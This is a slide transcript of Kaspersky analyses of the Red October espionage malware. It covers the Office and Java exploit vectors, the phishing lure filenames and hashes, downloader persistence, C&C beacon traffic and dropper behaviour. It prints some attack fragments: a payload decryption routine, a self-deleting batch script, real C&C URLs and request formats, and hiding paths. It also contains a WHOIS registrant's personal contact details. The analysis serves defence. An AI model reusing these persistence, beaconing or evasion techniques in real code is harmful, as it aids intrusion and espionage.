Red october. detailed malware description

3,742 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
3,742
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Red october. detailed malware description

  1. 1. Red October - Java Exploit Delivery Vector Analysis -SecurelistИсточник: http://www.securelist.com/en/blog/208194086/Red_October_Java_Exploit_Delivery_Vector_AnalysisRed October - Java Exploit Delivery Vector Analysis   0.6 GReAT Kaspersky Lab Expert Posted January 16, 13:00  GMT Tags: Targeted Attacks, Cyber espionage, Vulnerabilities and exploits, SpearphishingSince the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage ofanother delivery vector in the Red October attacks.In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers alsoinfiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - NewsFinder.jar), knownas the Rhino exploit (CVE-2011-3544).We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistentwith their approach in that its not 0-day. Most likely, a link to the site was emailed to potential victims, and the victimsystems were running an outdated version of Java.However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible forserving the .jar malcode archive, the line of code delivering the java exploit was commented out. Also, the related links,java, and the executable payload are proving difficult to track down to this point.The domain involved in the attack is presented only once in a public sandbox at malwr.com(http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that theyregistered the domain hotinfonews.com:Domain Name: HOTINFONEWS.COMRegistrant:Privat PersonDenis Gozolov (gozolov@mail.ru)Narva mnt 27TallinnTallinn,10120EETel. +372.54055298Creation Date: 14-Feb-2012Expiration Date: 14-Feb-2013Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike themany other Red October components.We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days,then didnt need the effort any longer. Which may also tell us that this group, which meticulously adapted and developedtheir infiltration and collection toolset to their victims environment, had a need to shift to Java from their usualspearphishing techniques in early February 2012. And then they went back to their spear phishing.
  2. 2. Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connectingwith a governmental economic research institute in the Middle East.So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script thatdelivers this file is very different from the common and related functionality that we see in the backdoors used throughoutthe five year campaign.The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt theURL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt theUrl for the downloader content:And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter p:Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloadsthe file from the URL and writes it to javaln.exe. Notice that the strb and stra variables maintain the same strings as the$files and $charset variables in the php script:This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in"hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed onthe victims machine. A description of that downloader follows. It is most interesting that this exploit/php combinationsencryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests
  3. 3. that potentially this limited use package was developed separately from the rest for a specific target.2nd stage of the attack: EXE, downloaderThe second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed bythe payload of the Java exploit. It acts as a downloader for the next stage of the attack.Known file location: %TEMP%javaln.exeMD5: c3b0d1403ba35c3aba8f4529f43fb300The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscationlayer, the same as used in many Red October modules. Obfuscation layer disassembledThe module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists.After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically onstartup:[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]JavaUpdateSln=%full path to own executable%[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun]JavaUpdateSln=%full path to own executable%Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds itsends a HTTP POST request to the following sites:
  4. 4. www.microsoft.com update.microsoft.com www.google.comOnce a valid connection is established, it continues to its main loop.C&C server connection loopEvery 180 seconds the module sends a HTTP POST request to its C&C server.The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.phpThe contents of the post request follow the following format:id=%unique user ID, retrieved from the overlay of the file%&A=%integer, indicates whether the autorun registry key was written%&B=%0 or 1, indicates if user has administrative rights%&C=%integer, level of privilege assigned to the current user% 00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.| 00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne| 00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas| 00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H| 00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin| 00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C| 00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6| 00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:| 00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w| 00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod| 000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395| 000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026| 000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB| 000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1| 000000e0 26 43 3d 32 |&C=2| HTTP POST request sent to the C&C serverThe module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a validEXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to"%TEMP%nvsvc%p%p.exe" (%p depends on system time) and executes it.3rd stage of the attack: EXE, unknownCurrently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe"downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.ConclusionsAs more information about the Red October becomes available and third parties are publishing their own research into theattacks, it becomes clear that the scope of the operation is bigger than originally thought.In addition to the Java exploit presented here, its possible that other delivery mechanisms were used during the 5 yearssince this gang was active. For instance, we havent seen any PDF exploits yet, which are very popular with other groups -an unusual thing.We will continue to monitor the situation and publish updates as the story uncovers.
  5. 5. “Red October”. Detailed Malware Description 1. FirstStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792265/Red_October_Detailed_Malware_Description_1_First_Stage_of_Attack“Red October”. Detailed Malware Description 1. First Stage of AttackFirst stage of attack 1. Exploits 2. Dropper 3. Loader Module 4. Main componentSecond stage of attack 1. Modules, general overview 2. Recon group 3. Password group 4. Email group 5. USB drive group 6. Keyboard group 7. Persistence group 8. Spreading group 9. Mobile group10. Exfiltration group1. ExploitsBased on the analysis of known cases, we identified two main ways through which Backdoor.Win32.Sputnik infects thevictims. Both methods rely on spear-phishing e-mails which are sent to the prospective victims. The e-mails contain anattachment which is either an Excel or Word document, with enticing names. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation(MD5:35f1572eb7759cb7a66ca459c093e8a1 - NewsFinder.jar), known as the Rhino exploit (CVE-2011-3544).
  6. 6. The Red October infection diagramThe Excel-based exploit - CVE-2009-3129This is the oldest known way for Red October to infect computers.A list of some of the Excel file names can be found below: File name: MD5: Katyn_-_opinia_Rosjan.xls bd05475a538c996cd6cafe72f3a98fae WORK PLAN (APRIL-JUNE 2011).xls f16785fc3650490604ab635303e61de2 EEAS-Staff New contact list (05-25-2011).xls 5f9b7a70ca665a54f8879a6a16f6adde "tactlist_05-05-2011_.8634.xls EEAS New contact list (05-05-2011).xls " bb2f6240402f765a9d0d650b79cd2560 Agenda Telefoane institutii si ministere 2011.xls 4bfa449f1a351210d3c5b03ac2bd18b1 Agenda Telefoane institutii si ministere 2011 (2).xls 4ce5fd18b1d3f551a098bb26d8347ffb FIEO contacts update.xls ec98640c401e296a76ab7f213164ef8c spisok sotrudnikov.xls d98378db4016404ac558f9733e906b2b List of shahids.xls dc4a977eaa2b62ad7785b46b40c61281
  7. 7. Spravochnik.xls 5ecec03853616e13475ac20a0ef987b6 Agenda Telefoane&Email institutii si ministere 2011.xls de56229f497bf51274280ef84277ea54 EEAS New contact list (05-05-2011) (2).xls 396d9e339c1fd2e787d885a688d5c646 FIEO contacts update.xls 7e5d9b496306b558ba04e5a4c5638f9f Telephone.xls c42627a677e0a6244b84aa977fbea15d List of shahids.xls 1f86299628bed519718478739b0e4b0c BMAC Attache List - At 11 Oct_v1[1].XLS f0357f969fbaf798095b43c9e7a0cfa7 MERCOSUR_Imports.xls 50bd553568422cf547539dd1f49dd80d Cópia de guia de telefonos (2).xls cee7bd726bc57e601c85203c5767293c Programme de fetes 2011.xls ceac9d75b8920323477e8a4acdae2803 12 05 2011 updated.xls 639760784b3e26c1fe619e5df7d0f674 telefonebi.xls d71a9d26d4bb3b0ed189c79cd24d179a telefonebi.xls dc8f0d4ecda437c3f870cd17d010a3f6The Excel based exploit is detected by Kaspersky products as Trojan-Dropper.MSWord.Agent.ga. It was apparently usedmostly in 2011, with several samples being uploaded to VirusTotal by the victims. For a detection link of various products,check:https://www.virustotal.com/file/afaebb8055559ea6bf88cedcd6fc7b93f02cde31a560876bcc4860fd0686739d/analysisSeveral detections include: Kaspersky Trojan-Dropper.MSWord.Agent.ga 20120808 McAfee Exploit-MSExcel.u 20120808 Microsoft Exploit:Win32/CVE-2009-3129 20120808 Symantec Bloodhound.Exploit.306 20120808 TrendMicro HEUR_OLEXP.B 20120808The Excel file properties for all the exploits indicate it has been edited on a system with Simplified Chinese Excel. Theexploit appears to have been compiled on 26 Nov 2009:EXIF METADATA ============= MIMEType : application/vnd.ms-excelCompany :ModifyDate : 2009:11:26 03:35:15TitleOfParts : Sheet1SharedDoc : NoAuthor :CodePage : Windows Simplified Chinese (PRC, Singapore)Title :AppVersion : 11.9999LinksUpToDate : NoScaleCrop : NoLastModifiedBy : qqHeadingPairs : ??????, 1
  8. 8. HyperlinksChanged : NoCreateDate : 1996:12:17 01:32:42Security : NoneFileType : XLSSoftware : Microsoft ExcelThe exact exploit type used by Red October in the XLS files is CVE-2009-3129.Exploit (CVE-2009-3129) information:“Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML FileFormat Converter for Mac; Office Excel Viewer 2003 SP3; Office Excel Viewer SP1 and SP2; and Office CompatibilityPack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary codevia a spreadsheet with a FEATHEADER record containing an invalid cbHdrData size element that affects a pointer offset,aka "Excel Featheader Record Memory Corruption Vulnerability."US-CERT info: https://www.us-cert.gov/cas/techalerts/TA09-314A.htmlPatch: http://technet.microsoft.com/en-us/security/bulletin/ms09-novThe vulnerability exploited by the Red October XLS dropper has been patched by Microsoft in November 2009.The CVE-2009-3129 exploit and shellcode Shellcode decryptor in XLS filesThe Red October XLS CVE-2009-3129 exploit appears to have been originally developed by Chinese hackers. It was alsoused in other, unrelated attacks against Tibetan activists and other entities. Its main purpose is to drop and execute aTrojan, which for Red October is in the range of 500-600kB.The shellcode receives control upon successful exploitation of the vulnerability and proceeds to decrypt itself. Oncedecrypted, the shellcode in turn decrypts the main malware body (at offset 0x6600 in the XLS files). The malware is storedin the Excel file at offset 0x6600, in encrypted form:
  9. 9. Encrypted malware payload in XLS filesThe malware is encrypted with a simple XOR+ROR algorithm:void decrypt(unsigned char *tbuf, unsigned long n, int round) { unsigned char b;long i;unsigned short ecx=0x400;unsigned char a;a=6;for (i=0;i<1024;i++) {b=tbuf[i];b=b^ecx;b = (b>>a) | (b<<(8-a));tbuf[i]=b;ecx--;}}The shellcode writes the main “top” Trojan dropper to a file named “Dcs.tmp” and runs it. It will also extract a dummy Excelfile which will be shown to the user if the exploit was successful. The dummy Excel is named “~ .xls”.The Word-based exploit – CVE-2010-3333The CVE-2010-3333 Word-based exploit (RTF files) has been observed in September and October 2012. Examplefilename / MD5 list related to the attack: File name: MD5: arexeio1.doc cb51ef3e541e060f0c56ac10adef37c3 Popa Tatiana -plîngere.doc 6B23732895DAAAD4BD6EAE1D0B0FEF08 La Política de Defensa y el Poder Naval en México OTAN (1).doc 44E70BCE66CDAC5DC06D5C0D6780BA45 Iran, Syria and the balance of power in the Middle East.doc 9F470A4B0F9827D0D3AE463F44B227DB Diplomatic Staff list.doc 91EBC2B587A14EC914DD74F4CFB8DD0F
  10. 10. Diplomatic Car for Sale - MB 2000.doc 85BAEBED3D22FA63CE91FFAFCD7CC991 Rulers have hostaged parliament to further their personal interest (1).doc B9238737D22A059FF8DA903FBC69C352 Итоги президенства В.Януковича.doc 2672FBBA23BF4F5E139B10CACC837E9F the wife of Ambassador-2.doc 65D277AF039004146061FF01BB757A8F Вожможные стратегические решения.doc 731C68D2335E60107DF2F5AF18B9F4C9 31086823_cm04639-re02 en12.doc 9B55887B3E0C7F1E41D1ABDC32667A93 16 октября 2012 года (дополнение).doc A7330CE1B0F89AC157E335DA825B22C7 delegat.doc FC3C874BDAEDF731439BBE28FC2E6BBE Davos2011_follow-up plan_heregjilt.doc 9950A027191C4930909CA23608D464CC Participant list 6th Forum 09-12 update.doc C78253AEFCB35F94ACC63585D7BFB176 Draft 3_Conference Renewable energy cooperation and Grid integration.doc 5D1121EAC9021B5B01570FB58E7D4622The Word based exploit is detected by Kaspersky products as Exploit.MSWord.CVE-2010-3333.bw. It was apparently usedmostly in 2012 (eg. October 2012), with one sample being uploaded to VirusTotal, probably by one of the victims. For adetection link of various products, check:https://www.virustotal.com/file/5fe53a960bc2031a185c575ea05ac466f26739a34c651c14260e4cfbc123e87f/analysis/Several detections include: Kaspersky Exploit.MSWord.CVE-2010-3333.bw 20121012 McAfee - 20121012 Microsoft Exploit:Win32/CVE-2010-3333 20121012 Symantec - 20121012 TrendMicro - 20121012The dropper is in fact an RTF file, with “author John Doe”, supposedly created by “mocrosoft office word Msfedit5.1.21.2500”.The same exploit / dropper have been observed in many other targeted attacks against for instance Tibetan activists. Itappears to be of Chinese origin just as the XLS exploit.The exact exploit type used by Red October in these RTF files is CVE-2010-3333.Exploit (CVE-2010-3333) information:“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to executearbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."MITRE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333CERT: http://www.us-cert.gov/cas/techalerts/TA10-313A.htmlMicrosoft: http://technet.microsoft.com/en-us/security/bulletin/ms10-novThe vulnerability exploited by Red October’s RTF documents was patched by Microsoft in November 2010.The CVE-2010-3333 exploit and shellcode
  11. 11. The RTF file acts as a dropper for the main Trojan body. It also contains a fake document which is shown to the user incase the exploit is successful. Encrypted trojan body inside RTF filesThe main Trojan body is encrypted “XOR 0xFB” and stored as hex text inside the RTF file. The shellcode decrypts themain body and executes it.The Word-based exploit – CVE-2012-0158In November 2012 we’ve noticed new attacks using document files that exploit CVE-2012-0158. This exploit has beenextremely popular with APT attacks during 2012 so it’s perhaps no surprise it was also adopted by the Red October gang.Example filename / MD5 list related to the attack: File name: MD5: Mazda.doc 93d0222c8c7b57d38931cfd712523c67 Komorowski.doc 51edea56c1e83bcbc9f873168e2370af Commercial Report for October.doc 114ed0e5298149fc69f6e41566e3717a Russian terrorist attack.doc 350c170870e42dce1715a188ca20d73b FLOC-meeting.doc 4daa2e7d3ac1a5c6b81a92f4a9ac21f1 3037.doc 82e518fb3a6749903c8dc17287cebbf8 8th_2012 Minutes of meeting.doc 3ded9a0dd566215f04e05340ccf20e0cThe CVE-2012-0158 exploit used in these attacks is mostly undetected by antivirus products at the time of writing of thisreport. Kaspersky Lab products catch and block the exploit using the state of the art “Automatic Exploit Prevention”technology.The same exploit / dropper have been observed in many other targeted attacks against for instance Tibetan activists. Itappears to be of Chinese origin just as the other exploits.The exact exploit type used by Red October in these RTF files is CVE-2012-0158.Exploit (CVE-2012-0158) information:
  12. 12. “The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the CommonControls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3;SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4,2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remoteattackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state"corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability.""NIST: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158Microsoft: http://technet.microsoft.com/en-us/security/bulletin/ms12-027The vulnerability exploited by these Red October RTF documents was patched by Microsoft in April 2012.The CVE-2012-0158 exploit and shellcodeThe RTF file acts as a dropper for the main Trojan body. It also contains a fake document which is shown to the user incase the exploit is successful. Encrypted Trojan dropper body in RTF files with CVE-2012-0158The main Trojan body is encrypted “XOR 0xDE” and stored as hex text inside the RTF file. The shellcode simply writes themain dropper to a file named “msmx21.exe” in the %TEMP% folder and runs it. It also extracts a fake document which isshown to the victim if the exploit has been successful.
  13. 13. Fake document shown to the victim if exploit is successfulThe Java based exploit - CVE-2011-3544Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage ofanother delivery vector in the Red October attacks.In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers alsoinfiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - NewsFinder.jar), knownas the Rhino exploit (CVE-2011-3544).We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistentwith their approach in that its not 0-day. Most likely, a link to the site was emailed to potential victims, and the victimsystems were running an outdated version of Java.However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible forserving the .jar malcode archive, the line of code delivering the java exploit was commented out. Also, the related links,java, and the executable payload are proving difficult to track down to this point.The domain involved in the attack is presented only once in a public sandbox at malwr.com(http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that theyregistered the domain hotinfonews.com:Domain Name: HOTINFONEWS.COMRegistrant:Privat PersonDenis Gozolov (gozolov@mail.ru)
  14. 14. Narva mnt 27TallinnTallinn,10120EETel. +372.54055298Creation Date: 14-Feb-2012Expiration Date: 14-Feb-2013Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike themany other Red October components.We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days,then didnt need the effort any longer. Which may also tell us that this group, which meticulously adapted and developedtheir infiltration and collection toolset to their victims environment, had a need to shift to Java from their usualspearphishing techniques in early February 2012. And then they went back to their spear phishing.Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connectingwith a governmental economic research institute in the Middle East.So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script thatdelivers this file is very different from the common and related functionality that we see in the backdoors used throughoutthe five year campaign.The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt theURL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt theUrl for the downloader content:And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter p:Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloadsthe file from the URL and writes it to javaln.exe. Notice that the strb and stra variables maintain the same strings as the$files and $charset variables in the php script:
  15. 15. This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in"hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed onthe victims machine. A description of that downloader follows. It is most interesting that this exploit/php combinationsencryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggeststhat potentially this limited use package was developed separately from the rest for a specific target.2nd stage of the Java exploit attack: EXE, downloaderThe second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed bythe payload of the Java exploit. It acts as a downloader for the next stage of the attack.Known file location: %TEMP%javaln.exeMD5: c3b0d1403ba35c3aba8f4529f43fb300The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscationlayer, the same as used in many Red October modules.
  16. 16. Obfuscation layer disassembledThe module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists.After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically onstartup:[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]JavaUpdateSln=%full path to own executable%[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun]JavaUpdateSln=%full path to own executable%Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds itsends a HTTP POST request to the following sites: www.microsoft.com update.microsoft.com www.google.comOnce a valid connection is established, it continues to its main loop.C&C server connection loopEvery 180 seconds the module sends a HTTP POST request to its C&C server.The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.phpThe contents of the post request follow the following format:
  17. 17. id=%unique user ID, retrieved from the overlay of the file%&A=%integer, indicates whether the autorun registry key was written%&B=%0 or 1, indicates if user has administrative rights%&C=%integer, level of privilege assigned to the current user% 00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.| 00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne| 00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas| 00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H| 00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin| 00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C| 00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6| 00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:| 00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w| 00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod| 000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395| 000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026| 000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB| 000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1| 000000e0 26 43 3d 32 |&C=2| HTTP POST request sent to the C&C serverThe module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a validEXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to"%TEMP%nvsvc%p%p.exe" (%p depends on system time) and executes it.3rd stage of the Java exploit attack: EXE, unknownCurrently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe"downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.2. DropperThe dropper module is a PE EXE file, compiled with Microsoft Visual Studio 2008. It is extracted and executed by one ofthe exploits used to deliver the malware to the victim.Known variants drop and execute the “loader” component named “svchost.exe” or “svclogon.exe” and one encrypted maincomponent file (see description of the “loader” component).Main functionRegistry key checkThe module generates a CLSID from the value of the SHA1 checksum of the system directory path and the serial numberof the system drive.Then, it tries to read the default value of the registry key:HKLMSoftwareClassesCLSIDgenerated_CLSID (if it has administrative rights)HKCUSoftwareClassesCLSIDgenerated_CLSID (if it has no administrative rights)It checks the contents of the default key value. This check succeeds if the registry key is not present or its value is equal tothe last DWORD of the file’s SHA1 checksum. Otherwise the check fails and it runs the check again each 3 millisecondsfor 4294967294 times.
  18. 18. Then, it sets the default value of the registry key to the hexadecimal representation of the value of the last SHA1’s DWORDand tries to read the registry value “InfoTip” from the same registry key. The registry value is assumed to be a 48-bytebinary buffer. It extracts a time parameter from that buffer and self-deletes if the difference between the recorded time andcurrent time is less than 3 days.This means that the updated modules can be delivered not sooner than in three days to the same victim. If someone triesto reinfect the system with the same dropper, it refuses to do so within 3 days from last infection. This can also be amechanism to escape from attention of power users or administrators who can run recently opened suspicious applicationagain and monitor its activity.This check is identical to the one implemented in the “loader” module.Installation routineThe module retrieves its resource of type “AAA” and name “000”. The resource is then decrypted using a custom RC4-likecipher with a hardcoded key. Offset Type Description 0 DWORD If equal to “1”, the dropper should self-delete and exit after processing the resource 4 DWORD If equal to “1”, the dropper should exit after processing the resource 8 DWORD Delay in milliseconds before processing the resourceThe resource header is followed by data entries each containing one file. Offset Type Description 0 DWORD Record type 4 DWORD Size of the file name in bytes 8 DWORD Size of the file contents 12 DWORD Reserved, equal to 0x7D4 16 BYTE[] File name, Unicode 16 + size of the file name BYTE[] File contentsEvery record is processed differently depending on the “Record type” value: Record type Action 0x07 Write the file to disk 0x08 Write the file to disk and execute immediately with CreateProcess() API Write to predefined directory: %System Directory%wmispoold%file name% (if has administrative rights) %APPDATA%wmispoold%file name% (if has user only rights) 0x09 0x09 – create new file and write to it 0x0A 0x0A – create new file, write and execute it 0x0D 0x0D – overwrite file 0x0E 0x0E – overwrite and execute file Tries to terminate any running process that belongs to the file being (over)written. Write to the first available directory from the hardcoded list (see below) 0x0B 0x0B – write file
  19. 19. 0x0C 0x0C – write and execute fileThe module sets file creation/modification time equal to the one of the “%windir%system32kernel32.dll” file.For record types 0x0B and 0x0C, the module tries to write the file to the first available directory from the list:%ProgramFiles%Windows NT%APPDATA%Microsoft%ProgramFiles%Windows NTAccessories%ProgramFiles%Windows NTPinball%ProgramFiles%Windows Media Player%ProgramFiles%Web Publish%ProgramFiles%Outlook Express%ProgramFiles%Microsoft OfficeOffice10Data%ProgramFiles%Microsoft OfficeOffice10%ProgramFiles%Microsoft Frontpage%ProgramFiles%Internet Explorer%ProgramFiles%ComPlus Applications%ProgramFiles%WindowsUpdate%CommonProgramFiles%Microsoft SharedMsInfo%CommonProgramFiles%Microsoft SharedOffice10%CommonProgramFiles%Proof%CommonProgramFiles%Web Folders%CommonProgramFiles%Web Server Extensions%CommonProgramFiles%Systemado%CommonProgramFiles%Systemmsadc%SystemDrive%Documents and SettingsLocalServiceApplication DataMicrosoft %SystemDrive%Documents and SettingsLocalServiceLocal SettingsApplication DataMicrosoft%ALLUSERSPROFILE%Application Data%windir%Installer%windir%HelpToursmmTour%windir%HelpTourshtmTour%windir%HelpToursWindowsMediaPlayer%windir%IME%windir%MsApps%windir%MsAppsMsInfo%windir%inf%ALLUSERSPROFILE%Application DataMicrosoft%ALLUSERSPROFILE%Application DataMicrosoftOffice%ALLUSERSPROFILE%Application DataMicrosoftOfficeData%ALLUSERSPROFILE%Application DataMicrosoftWindows%HOMEPATH%Local Settings%APPDATA%%APPDATA%MicrosoftOffice%APPDATA%MicrosoftOfficeData%APPDATA%MicrosoftWindows%windir%Temp%TMP%%TEMP%
  20. 20. Post processingThe module deletes the following registry keys:HKCUSoftwareMicrosoftOffice11.0WordResiliencyStartupItemsHKCUSoftwareMicrosoftOffice11.0WordResiliencyDisabledItemsThis is done to erase the list of Microsoft Word documents that might need recovery, probably to avoid showing up thedocument with exploit again if it crashed Microsoft Word process.Self removal procedureThe dropper creates a file “%TEMP%msc.bat”, executes it and exits, effectively self-deleting its body: chcp 1251 :Repeat attrib -a -s -h -r "%path to own executable file%" del "%path to own executable file%" if exist "%path to own executable file%" goto Repeat del "%path to own executable file%"Known variants MD5 Compilation date (source) Compilation date (payload) D784EAB30F85D2CDFB14ED1B0D98C98C 2011.07.06 07:41:01 (GMT) 2011.03.15 07:43:59 (GMT) 418B7A888484BDCBBA3B431ACC57B6AB 2011.09.22 04:52:59 (GMT) 2011.03.15 07:43:59 (GMT) 5C23DBF7B2BED5D54EADC47889EE1038 2011.06.23 09:53:26 (GMT) 2011.03.15 07:43:59 (GMT) EA2765A3D9F865EF7546BA7F5F145E95 2011.06.30 08:26:29 (GMT) 2011.03.15 07:43:59 (GMT) 4A5F5C6E1AD30CF2799E3EA13468B3C2 2011.07.07 09:27:34 (GMT) 2011.03.15 07:43:59 (GMT) A03CCD50DB47361E6BD9B05017372110 2011.04.21 10:47:12 (GMT) 2011.03.15 07:43:59 (GMT) FA28873EFD2279E9AF79202E9A7E9398 2011.08.16 06:31:24 (GMT) 2011.03.15 07:43:59 (GMT) 4ACE8A18C8710B40FF9B47F29F82EAC7 2011.08.18 06:21:22 (GMT) 2011.03.15 07:43:59 (GMT) 204F7BFA78ED99E623DEF43BA0A188C9 2011.07.20 13:04:53 (GMT) 2011.03.15 07:43:59 (GMT) 35061250A7C580A4CEA31F29E050C4FF 2011.03.14 14:46:51 (GMT) 2011.03.03 12:50:46 (GMT) 58C5D4158DF279E9038344D0B420BEDE 2011.03.14 14:58:56 (GMT) 2011.03.03 12:50:46 (GMT) 